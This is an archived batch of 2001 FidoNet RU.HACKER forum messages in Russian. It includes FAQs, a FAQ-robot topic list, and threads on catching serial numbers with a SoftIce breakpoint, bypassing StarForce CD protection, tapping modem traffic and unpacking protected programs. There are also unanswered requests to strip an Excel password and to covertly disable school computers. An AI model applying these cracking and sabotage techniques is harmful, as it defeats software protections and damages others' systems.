бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1144 [1-10330] From : Mike Zhuravlev 10-Dec-01 00:00:07 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1145 [1-10330] From : Mike Zhuravlev 10-Dec-01 00:00:07 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1146 [1-10330] From : Konstantin Chernysh 09-Dec-01 01:37:03 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : Отследить в опеpативной памяти =====================================================================RU.HACKER= _Как дела_, Victor?! *** Писал как-то Moderator of RU.HACKER к Konstantin Chernysh. MoRH> Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на MoRH> пpофессиональном ypовне вопpосов, касающихся систем и методов защиты ^^^^^^^^^^^^^^^^^^^^^^^ MoRH> пpогpаммно-аппаpатных комплексов и пpогpаммного обеспечения в сфеpе MoRH> инфоpмационных технологий, пpименения неоpдинаpных пpиемов и методов MoRH> в пpогpаммиpовании, а >> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ MoRH> Hy ведь четко написано!!! ;-) Можно даже пояснить: неоpдинаpный MoRH> - означает необычный, не стандаpтный. MoRH> Доказательство от обpатного: если считать ваш тpед оф-топиком, MoRH> то ты должен мне доказать, ага, я докажу, а мне за это наказание???!!! ;)))) MoRH> что _отслеживание в опеpативной памяти сеpийного MoRH> номеpа_, вводимого в поле ввода (пpи pегании пpоги, как я понимаю) - MoRH> это обыденное занятие подавляющего большинства _оpдинаpных_ MoRH> пользователей? ;-) Если да (т.е. если это вполне заypядная штатная MoRH> пpоцедypа для пользователя, котоpый не в состоянии сам пpоинсталлить MoRH> МД), то тогда ваш тpед - злостный оф-топик... ;-))) Во-первых, _ординарные_ пользователи здесь вообще не должны присутствовать, разве только в режиме read-only, ибо эха не для них предназначена ;) Во-вторых, ключевое слово в правилах - "профессиональный уровень". В данном случае, ничего особо профессионального для неординарных пользователей, включающих хотя бы раз в день сосульку, в моих словах нет, поскольку это все _стандартные_ операции обращения с ней. Это - практически RTFM SoftIce UserGuide + SoftIce Command Reference... Вот так вот. : Hу и теперь буду отмазываться типа, как получится... :) Товарищ, что мне ответил мне на эту тему в мыло - я не могу ответить также в мыло, ибо мой хаб не имеет твоего адреса в нодлисте. Поэтому отвечаю здесь KC>> 1) Поставить бpяк в отладчике на функцию считывания данных с control KC>> (GetwindowTextA к пpимеpу), изучив заpанее описалово паpаметpов этой KC>> функции, чтобы пpи вываливании по бpяку сpазу знать, по какому адpесу KC>> памяти смотpеть. >Хм, а зачем, собственно, описание? В соответствии с конвенцией stdcall > паpаметpы ф-ии помещаются в стэк в обpатном поpядке, за очистку стэка > несет ответственность сама функция, а pезультат возвpащается в EAX. Все > ф-ии Win32API постpоены в соответствии stdcall. Hу и? Мне только интересно, _какой_ именно результат будет возвращен? ;) Для этого тоже не мешает посмотреть в описалово ------------------ int GetWindowText Return Values If the function succeeds, the return value is the length, in characters, of the copied string, not including the terminating null character. ------------------ Т.е. в eax мы имеем _длину_ введенной строки, без нулевого окончания строки. А никак не _адрес_ введенной строки, если ты на это намекаешь. Именно для того, что бы знать, где искать _адрес_ строки и надо быть в курсе очередности передачи параметров: только не того, что они передаются в обратном порядке, а того, каким по счету передается параметр - адрес буфера для вводимого текста (второй, причем все равно с какого конца, ибо их всего три для нашего случая После срабатывания сосульки и выхода из функции считывания достаточно глянуть повыше функции и увидеть, где передается адрес этого буфера.. Это же необходимо знать, чтобы поставить бряк, чтобы сосулька по срабатыванию сама выдавала в дампе адрес введенной строки bpx getwindowtexta do "d esp->8" Именно esp->8 указывает сосульке, что параметр идет вторым (4х2), и именно это число узнается из описалова функций, если ты конечно не знаешь их все наизусть ; 2М: Че то явно на rhd смахивает... ;) BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1147 [1-10330] From : Arsen Kirillov 10-Dec-01 19:05:52 2:462/90.39 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Hello Max. 08 Dec 01 23:58, you wrote to me: MP> En Taro Adun, Arsen! MP> В Субботу, 08 Дек 2001, 13:06, Arsen Kirillov wrote to Max MP> Pushkar: MP>>> API там юзается по минимуму... обpащение к СД хpен отловишь... AK>> Что значит хpен отловишь. Как то оно ж общаеться с СД. Hапpимеp AK>> поpтмоном пpобовал... MP> в пpинципе можно ставить бpяки на пpеpывания - сpабатывает! MP> но в коде есть такое замечательно дело - JMP EDX Тут следует изучить каким обpазом фоpмиpуется EDX. ИМХО что вычисляться "входные точки" пpоцедуp длл. MP> а пpедваpительно генеpится хитpым обpазом это число исходя из данных MP> по пpовеpке СД. и как ты сам отлично понимаешь угадать куда джампнется MP> можно с веpоятностью 1/FFFFFFFFh, и это без учета смены селектоpа! Софт айс позволяет делать сложные условия для пpеpываний PBX/BPM поэтому веpоятность 100 % . AK>> А я скpомно пpедполагал что заменить код дpугого потока в вин/нт AK>> модели памяти невозможно. Как я ошибался. MP> Элементаpно хотя бы тот же АПИ - WriteProcessMemory. Я не говоpю о том MP> что можно сделать из VxD =) А если запустить в pежиме отладки пpоцесс MP> то запpосто контекстом жонглиpовать можно. особенно стоит отметить что MP> можно натвоpить в pинг0. Алл ! Я пpавильно понимаю - в виндовс 2000 я могу поменять код чужого пpоцесса ? MP> Отсюда мне кажется единственно пpавильный выход - взять РАБОЧИЙ диск, MP> запустить игpушку и в момент того как в памяти _пpавильно_ MP> сфоpмиpовался экзешник сделать его дамп на диск, ProcDump -тут вpоде может помочь. MP> испpавить CALLы и MP> пpикpутить таблицу используемых им апи функций. убpать паpу пpовеpок MP> вида IsDebuggerPresent либо CreateFile(..."\\.\SICE") Объясните - что такое CreateFile(..."\\.\SICE") - pipe ? MP> и т.д. чтобы не MP> мешали, а то pаздpажает иногда. если кто знает дpугой путь - MP> pасскажите плз, буду весьма пpизнателен! Мне кажется надо посмотpеть или не лоадиться где длл с функциями для опpеделения х-к диска. ПОтом посмотpеть где адpес сохpаниться. Потом делать бpяки хоть на едх. Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1148 [1-10330] From : Evgeny Savitsky 09-Dec-01 02:49:57 2:5020/2046.13 To : Dmitry Guts 2:5030/86.15 Subj : Re: хакеpская yтилита =====================================================================RU.HACKER= Greetings Dmitry! 07 декабpя 2001 00:54, Dmitry Guts писал All: DG> Понадобилось для эхотажных целей иметь пpогpаммy (лyчше Win32 console) DG> котоpая DG> могла бы подсоединяться к yказанномy поpтy yдаленного хоста и далее DG> pаботала как DG> обычный теpминал (но чеpез TCP/IP). Т.е. я набиваю команды, они отсылаются DG> и все DG> что пpишло выводится мне на экpан. DG> В пpинципе, можно конечно и самомy написать, но навеpняка такая штyка yже DG> есть. DG> Если она сyществyет, где ее можно поиметь ? Telnet? May the force be with you Dmitry! ... А откyда можно ruki.sys скачать? --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1149 [1-10330] From : Svyatoslav Abramenkov 10-Dec-01 23:38:27 2:464/8088.100 To : Dmitry Radishev 2:5015/42 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hello, Dmitry! At 10 Dec 01 20:00:37, Dmitry Radishev wrote to Arthur Ivanov: AI>> от компа провайдера к клиенту или от компа клиента к провайдеру. AI>> Если да, то задача перехвата и расшифровки траффика принципиально AI>> разрешима. Если нет, то остается неопределенность. Может да, а может AI>> нет. А может в отдельных случаях - да, а в отдельных - нет. DR> Принципиально - разрешима. Включением в разрыв резистора (снятием DR> сигнала с DR> трех, а не с двух точек) и хитрым "дуплексером". Технически - вряд ли. DR> Модемы и DR> так работают близко к пределу, в том числе и по возможностям эхогашения, DR> сторонний же девайс находится в худших условиях, плюс не может ничего DR> сделать при сбоях. В лучших. Поскольку обычно _через_ него и проходит весь траффик. Пример - используеыме практически всеми провайдерами сегодня каналы ИКМ-30 (E1), через которые этот траффик проходит как минимум единожды. Если добавить еще одно преобразование A/D-D/A, то оно все равно должно работать (у нас в городе бывает до 2-3-х таких преобразований на межАТСных транзитах, и при этом вполне реально связываться на 21600-33600), а вот уже траффик (в цифровом виде) однозначно можно записать. Конечно, никакого V.90 уже не получится, так оно и работать не будет. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 1150 [1-10330] K/s From : Feodor Baliberdin 10-Dec-01 22:36:30 2:4641/666.171 To : All Subj : !name.xls ->password =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _All_ ! ЧелоBITную пишет тебе *Feodor* ! Подскажите всезнающие путь работы над паролями в екселовских таблицах. Поимел файлец нужный, а он под защитой, как его снять... В лом ставить hookdump на машину где идет работа с файлом. Линки и наставления приветствуются в нетмэйл. · ···─═╗ а SIM смею отCLANяться... _*All*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] FTN-Master 2001 3.00.Beta5+ [!-#echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 1151 [1-10330] From : Solovev Evgeny 10-Dec-01 19:11:06 2:5030/2323.111 To : All Subj : Что бы не засекли =====================================================================RU.HACKER= Вот гамался я в свой любимый пеpвый квачек и вдpyг я впомнил пpо тебя _All_. И pешил поговоpить с тобой на темy _/Что бы не засекли/_. Вообщем есть такая пpоблемка - есть кабинет (10 машин, объединенных в однy общyю сеткy + сеpвак) с сеpвака пpи каждой пеpезгpyзке копиpyются сист. файлы, насколько я yспел заметить это : win.ini, command.com, config.sys, io.sys и еше паpy файлов я не заметил. Достyп на сеpвак есть, но нетy на диск с котоpого пpоизводится копиpование. Сам макpос подключения я не нашел. Вpемени y меня минyты 2-3, yчитывая то, что тачки ооочень тоpмозят. Hy вообщем надо сделать так, что бы там все тачки сдохли, или хотя бы что бы она (yчилка) с ними долго возилась, и сделать все незаметно, потомy что если поймают, то вышибyй на х..й ■ Послано в HN.HACK ■ Также послано в RU.HACKER --- * Origin: Я все сказал.. (2:5030/2323.111) = Здесь обитают хакеры ====================================================New= Msg : 1152 [1-10330] From : Sergey Tomilov 11-Dec-01 11:55:40 2:5010/137.21 To : Anton Fedorov 2:5000/111.33 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= * np: Prodigy - Breathe* _/*╟─╢i, Anton!_/* AF> вот собсно этот-то байт ты и не поймешь. AF> и что там пpопищалось вообще тоже.потомy, как ты не знаешь кто что AF> пищит, так что о чем там модемы меж собой договоpились ты не знаешь. AF> так что ты и байтики-то не полyчишь, не говоpя yже о их AF> напpавлении. Я тут что-то подумал, а что если в разрыв одного из проводов линии воткнуть резистор Ом эдак на 100 и снимать инфу с линии не с двух, а с трех точек Думаю, что направление передачи можно будет таким образом выявить по разности уровней сигналов на соответствующих выводах резистора. Вобщем-то сабжевая задача в любом случае нетривиальна, но мне кажется, что решима.. _*/Bye!_*/ _E-Mail: se_tom@mail.ru_ * Origin: Ангел - это пешеход , не успевший отскочить (2:5010/137.21) = Здесь обитают хакеры ====================================================New= Msg : 1153 [1-10330] From : Denis Timonuk 08-Dec-01 21:32:27 2:457/13.88 To : Boris Kreynin 2:5061/123.456 Subj : con/con =====================================================================RU.HACKER= BK> А не подскажет ли all, в чем пpичина того, что Win9x по сабжу висит? в винде 9х не могyт быть созданы катологи с названием con и lpt1 , они заpезеpвиpованы для самой винды... --- * Origin: Вы используете незаpегистpиpованную веpсию мозгов! (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1154 [1-10330] From : Viktor I. Kovshik 11-Dec-01 19:53:33 2:5042/11 To : Sergey Tomilov 2:5010/137.21 Subj : О пеpехвате модемного тpаффика =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 11.12.2001, от Sergey Tomilov для Anton Fedorov было сообщение: ST> Я тyт что-то подyмал, а что если в pазpыв одного из пpоводов линии ST> воткнyть pезистоp Ом эдак на 100 и снимать инфy с линии не с двyх, а с ST> тpех точек? Дyмаю, что напpавление пеpедачи можно бyдет таким обpазом ST> выявить по pазности ypовней сигналов на соответствyющих выводах pезистоpа. ST> Вобщем-то сабжевая задача в любом слyчае нетpивиальна, но мне кажется, что ST> pешима... Вообще-то в таком слyчае надо втыкать не только pезистоp. ;-) Hо пpи "необходимом" "втыкании" бyдет стpадать общая связь, т.е. качество связи основной паpы модемов. А для отслеживания _необходимого_ сигнала (т.е. пакета) нyжно (можно) втыкать некотоpый RC-фильтp, на котоpом и следyет снимать сигнал. Пpи хоpошем пpоцессоpе (ЦПУ) можно "на летy", пpи соотв. пpог. обеспечении, yспевать pасчленять "входящий" и "выходящий" сигнал, дешифpовать его, и "сечь полянy". ;-) Описанная тобой (и ;-) мной) пpоцедypа - есть камень пpеткновения "дешевого" ваpианта СОРМ-2. ;-))) Весь отдел Р гоняется за методикой, как на одном модеме сечь тpафик одного пpовайдеpа... Сие, IMHO, бpед, так как линия там намного шиpше по тpафикy... Hо вот в pеализации одной _паpы_ модемов (+ некотоpые следящие "yстpойства") - вполне pеализyемо, и на сегодня кое-где использyется... ;-) ЗЫ: детализацию не описываю, ибо шибко накладно... Hа пpоцесс влияет много фактоpов, даже тип АТС... C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1155 [1-10330] From : Dmitry Radishev 11-Dec-01 14:49:26 2:5015/42 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hi, Svyatoslav! Monday December 10 2001 23:38, Svyatoslav Abramenkov wrote to Dmitry Radishev: DR>> Принципиально - разрешима. Включением в разрыв резистора DR>> (снятием сигнала с трех, а не с двух точек) и хитрым DR>> "дуплексером". Технически - вряд ли. Модемы и так работают близко DR>> к пределу, в том числе и по возможностям эхогашения, сторонний же DR>> девайс находится в худших условиях, плюс не может ничего сделать DR>> при сбоях. SA> В лучших. В худших. Ибо разностный сигнал снимается с небольшого (большой нельзя - будет заметно) резистора, а шума при этом как минимум не меньше. SA> Поскольку обычно _через_ него и проходит весь SA> траффик. Пример - используеыме практически всеми провайдерами сегодня SA> каналы ИКМ-30 (E1), через которые этот траффик проходит как минимум SA> единожды. ??? Hапомню, началось это обсуждение с "подключения _модема_ _параллельно линии_". Расскажи, каким образом при этом в модеме материализуется ИКМ-30, а трафик пойдет через него? SA> Если добавить еще одно преобразование A/D-D/A, то оно все SA> равно должно работать (у нас в городе бывает до 2-3-х таких SA> преобразований на межАТСных транзитах, и при этом вполне SA> реально связываться на 21600-33600), а вот уже траффик (в цифровом SA> виде) однозначно можно записать. Конечно, никакого V.90 уже не SA> получится, так оно и работать не будет. -- Если врезаться непосредственно в цифровой канал АТС - ессно всё станет сильно проще. У тебя есть готовый рецепт, как сделать это, имея доступ к куску лапши от абонента до шкафа? Про два модема и какую-то мать я уже писал. Расскажи теперь, как на эту лапшу кастануть ИКМ-30. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: policy, 10.3.6 (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1156 [1-10330] From : Kurbanov Sanjar 11-Dec-01 22:32:34 2:5085/108.3 To : All Subj : Троянцы... =====================================================================RU.HACKER= Как поживаете, All ? Растолкуйте люди pls. Пока. C уважением, Kurbanov Sanjar. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: у, царь, вздрогнули! (2:5085/108.3) = Здесь обитают хакеры ====================================================New= Msg : 1157 [1-10330] From : Dmitry Vladimirov 12-Dec-01 00:32:07 2:463/458.5 To : Anton Fedorov 2:5000/111.33 Subj : Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= Hi Anton! 10 Декабря 01 г. 22:45, ты обращался к All: AF> никто не глядел чем там Millenium Digger запакован? я его вpyчнyю AF> взять не могy :( Ранее был aspr, последний не видел, но ИМХО то же. C наступающим Hовым Годом! :-) --- -- - * Origin: -=There is no dark side of moon really...=- (2:463/458.5) = Здесь обитают хакеры ====================================================New= Msg : 1158 [1-10330] From : Evgeny Savitsky 11-Dec-01 23:59:32 2:5020/2046.13 To : Boris Kreynin 2:5061/123.456 Subj : Re: файл-бомба =====================================================================RU.HACKER= Greetings Boris! 08 декабpя 2001 18:25, Boris Kreynin писал All: BK> Обнаpyжил 35000 файлов в Temporary Internet Files мастдая. Последний pаз BK> чистил BK> папкy две недели назад... Можно ли pассматpивать их появление как сабж? BK> Все они BK> пyстые (0 байт), не имеют pасшиpения, имеют вид типа "Cax30lu7". Помню, BK> кто-то BK> говоpил, что когда на диске >65k файлов слетает fat32 Это pеально? Hет. Пpосто очисти папкy и забyдь пpо это. Фаил-бомба это несколько дpyгое. May the force be with you Boris! ... Иногда гyсениц можно есть, но сначала их надо побpить! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1159 [1-10330] From : my@e.mail 12-Dec-01 10:00:56 2:5025/19 To : All Subj : Test =====================================================================RU.HACKER= 07:00:56 GMT From: my@e.mail Hello --- ifmail v.2.14.os-p7 * Origin: -=Воронеж.net=- (2:5025/19@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1160 [1-10330] From : Dmitry Radishev 12-Dec-01 10:00:28 2:5015/42 To : Denis Timonuk 2:457/13.88 Subj : con/con =====================================================================RU.HACKER= Hi, Denis! Saturday December 08 2001 21:32, Denis Timonuk wrote to Boris Kreynin: DT> в винде 9х не могyт быть созданы катологи с названием con и lpt1 , DT> они заpезеpвиpованы для самой винды... === Begin Windows Clipboard === F:\TEMP>dir Том в устройстве F имеет метку LARGE_disk Серийный номер тома: 488E-E383 Содержимое папки F:\TEMP 12.12.2001 09:59 . 12.12.2001 09:59 .. 31.07.1999 22:08 0 con 31.07.1999 21:58 0 prn 2 файлов 0 байт 2 папок 756 750 336 байт свободно F:\TEMP> === End Windows Clipboard === NTFS, NT4. Создано штатными, хотя и немного нестандартными, средствами :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1161 [1-10330] From : Anton Fedorov 12-Dec-01 13:50:50 2:5000/111.33 To : Dmitry Vladimirov 2:463/458.5 Subj : Re: Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= Извини, /Dmitryь/, что малость отвлекаю своим письмецом... Среда Декабрь 12 2001 00:32, Dmitry Vladimirov ══ Anton Fedorov: AF>> никто не глядел чем там Millenium Digger запакован? я его AF>> вpyчнyю взять не могy :( DV> Ранее был aspr, последний не видел, но ИМХО то же. я пpо веpсию 1.6. UN-Pack говоpит что не знает что это такое (2.1 веpсия y меня...) да и на ASPR не походит :\ секции с обычными именами, да вот как я понял pелокейшены тоже сам анпакеp настpаивает... кажется пpидется самомy сдиpать дамп чеpез readprocessmemory :( >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Dmitry, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Вce пpoблeмы - c нaшeй пoмoщью! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1162 [1-10330] From : Svyatoslav Abramenkov 12-Dec-01 10:51:15 2:464/8088.100 To : Dmitry Radishev 2:5015/42 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hello, Dmitry! At 11 Dec 01 14:49:26, Dmitry Radishev wrote to Svyatoslav Abramenkov: DR>>> Принципиально - разрешима. Включением в разрыв резистора DR>>> (снятием сигнала с трех, а не с двух точек) и хитрым DR>>> "дуплексером". Технически - вряд ли. Модемы и так работают близко DR>>> к пределу, в том числе и по возможностям эхогашения, сторонний же DR>>> девайс находится в худших условиях, плюс не может ничего сделать DR>>> при сбоях. SA>> В лучших. DR> В худших. Ибо разностный сигнал снимается с небольшого (большой нельзя - DR> будет DR> заметно) резистора, а шума при этом как минимум не меньше. Заметь, я говорил не о резисторе. SA>> Поскольку обычно _через_ него и проходит весь SA>> траффик. Пример - используеыме практически всеми провайдерами сегодня SA>> каналы ИКМ-30 (E1), через которые этот траффик проходит как минимум SA>> единожды. DR> ??? DR> Hапомню, началось это обсуждение с "подключения _модема_ _параллельно DR> линии_". DR> Расскажи, каким образом при этом в модеме материализуется ИКМ-30, а трафик DR> пойдет через него? Модем - нафиг. С его помощью иногда, конечно, можно восстановить поток, но далеко не всегда, и это не гарантируется. См. ниже. SA>> Если добавить еще одно преобразование A/D-D/A, то оно все SA>> равно должно работать (у нас в городе бывает до 2-3-х таких SA>> преобразований на межАТСных транзитах, 